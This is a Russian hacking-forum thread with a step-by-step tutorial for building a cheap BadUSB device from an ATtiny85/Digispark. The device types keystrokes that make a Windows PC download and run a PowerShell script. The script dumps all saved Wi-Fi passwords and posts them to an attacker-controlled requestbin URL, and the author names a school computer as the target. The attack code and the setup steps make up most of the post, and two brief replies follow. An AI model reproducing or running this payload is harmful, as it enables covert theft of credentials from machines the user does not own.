Настройка attiny85 | BadUSB | RUBBER DUCKY

Тема в разделе "Уязвимости и взлом", создана пользователем Moshennik, 28 окт 2017.

  1. Moshennik

    Moshennik

    Сообщения:
    288
    Баллы:
    16
    Внимание копипас не надо говорить что видели и тд но тут нету !
    Тут на днях приехала attiny85. Покупалась с целью создания чего-то типа https://hakshop.com/products/usb-rubber-ducky-deluxe.

    Решил разобраться сам и поделиться с Вами результатом.



    Разница в ценах конечно заметна:

    http://telegra.ph/file/6d0a0ab6bfa79eb41bd9f.png
    http://telegra.ph/file/cb342b781025b9f44a166.png


    Сразу решил разбираться, что можно натворить с помощью данной штучки. Пришел к выводу, что если есть лишние деньги, то шняга за 50$ от ребят из hak5gear будет намного функциональнее. Однако выжать свое можно и из attiny85.



    Начинаем с установки нужных приложений на наш PC.
    Устанавливаем дрова.

    http://iarduino.ru/file/220.html, поставили.

    Первое, что нам нужно - https://www.arduino.cc/en/Main/software (первая кнопка там Windows Installer). Скачали, установили.

    Дальше заходим в "Файл - Настойки"

    http://telegra.ph/file/618175616f077e1ba9926.png
    Там видим такую тему:я

    http://telegra.ph/file/20d03326adfbb778e35ec.png
    Вставляем туда ссыль: http://digistump.com/package_digistump_index.json

    Далее топаем в "Менеджер плат"

    http://telegra.ph/file/c33cda4312651e65cd2ac.png
    Туда вставляем это: Digistump AVR Boards, жмем More info и жмем "Install" (на скрине уже установлено). Дожидаемся конца установки.

    http://telegra.ph/file/75a761405a92d7fd92b6b.png
    Далее снова топаем в Настройки, находим там пункт "Другие настройки можно редактировать непосредственно в файле" и жмем по пути. В открывшийся путь дописываем "\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard". Находим там файл DigiKeyboard.h и открываем его блокнотом.

    Дописываем туда, где коды клавиш это:

    #define KEY_ENTER 40

    #define KEY_SPACE 44

    #define KEY_SINGLEQ 49

    #define KEY_COLON 55

    #define KEY_HYPHEN 56

    #define KEY_DELETE 76

    Сейвим, закрываем.

    В самой ардуине снова находим платы, и выбираем там Digispark (Default – 16.6 mhz).

    Считайте, что программу мы настроили.





    Подключаем возможность пиздить пароли от Wi-Fi с компьютера.
    Ориентировано под Windows офк, т.к. целью является ПК на учебе.

    Идем на https://requestb.in/. Делаем новую "корзинку".

    http://telegra.ph/file/0f967713aa1cdb0a2d4a4.png
    Копируем ее ссылку (не из адресной строки с ?inspect, а ту, что будет посередине экрана). Копируем желательно в блокнот, ибо потеряется.

    Идем на https://pastebin.com/. ОБЯЗАТЕЛЬНО регаемся (через что угодно, хоть гугл).

    Делаем новую пасту

    http://telegra.ph/file/4056be2d758cebada36e5.png
    И вставляем туда код:

    $wifi_ru=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
    $wifi_en=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "key\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
    $url="https://requestb.in/zz0nzqzz"
    $wifi_ru
    $wifi_ru | Out-File tmp.txt
    $data=Get-Content .\tmp.txt
    $data
    Invoke-RestMethod -Method Post -Uri $url -Body $data
    Remove-Item -Path shellcode.txt
    Set-Clipboard -Value "Your computer was fucked up!"
    clear
    exit



    Вставили? Сохраняйте. Сохранили? Молодцы. Тыкаем вот сюда

    http://telegra.ph/file/90ce658dd10c6cbda7811.png
    И копируем ссылку на то, что открылось. Ее тоже в блокнот.

    Дальше делаем вторую пасту. В нее пишем это:

    $source = "ВАША ССЫЛКА НА ПАСТУ"
    $destination = "shellcode.txt"
    $web = New-Object System.Net.WebClient
    $web.DownloadFile($source, $destination)
    $file = Get-Content -Path $destination -Encoding UTF8
    Set-Clipboard -Value $file



    Надеюсь то, что вместо ВАША ССЫЛКА НА ПАСТУ вы вставили ту ссылку, которая в блокноте вторая, да?

    В этой пасте тоже нужно нажать на RAW, и ссылка в блокнот скопировать.

    Так, вроде как все. Дальше открываем ардуино, и копируем туда код:

    #include "DigiKeyboard.h"

    void setup() {
    DigiKeyboard.update();
    }

    void loop() {
    delay(1000);
    DigiKeyboard.update();
    delay(100);

    // meta+r, delete content, start powershell
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r
    delay(100);
    DigiKeyboard.sendKeyStroke(KEY_DELETE); // Clean it up
    delay(50);
    DigiKeyboard.println("powershell");
    delay(200);
    DigiKeyboard.println("iex (New-Object Net.WebClient).DownloadString(\"ССЫЛКА НА ВТОРУЮ ПАСТУ\")");
    delay(3000);
    DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT);
    delay(50);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    delay(900000);
    }



    Да, вместо ССЫЛКА НА ВТОРУЮ ПАСТУ пишем сслыку на последнюю созданную пасту.

    Seems like это все. Нажимаем сюда вот

    http://telegra.ph/file/95bc8c64b2f271917f8cb.png


    и следим за консолью внизу. Как появится надпись со скрина ниже - пихаем attiny85 в порт USB.

    http://telegra.ph/file/0dc32e5e93baa53070896.png


    Если вылезло это - молодцы, все сделали верно. Если нет - попробуйте еще раз.

    http://telegra.ph/file/ab7eeca87d6d3b7555178.png


    P.S. Вставляя в ПК эту штуку, чекайте расскладку клавиатуры. Работает на английской только, думаю тут ясно. А все пароли от ВиФи будут отправляться на ту реквестбин, которую вы сделали. Открываете главную страницу реквестбин, и там будут справа ваши корзинки. Тыкаете на нужную и юзаете. Ну либо берете ссыль из блокнота, и добавляете в ее конец.
  2. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Ага. Будет полезно тем, кто купил/купит такие девайсы. Я не стал с ними заморачиваться, использую NetHunter/обычн. флешку. Думал купить утку, но сука дорого, жаба душит.
  3. Sleight

    Sleight

    Сообщения:
    238
    Баллы:
    16
    Вот еще по этой же теме инфа была

Поделиться этой страницей

Top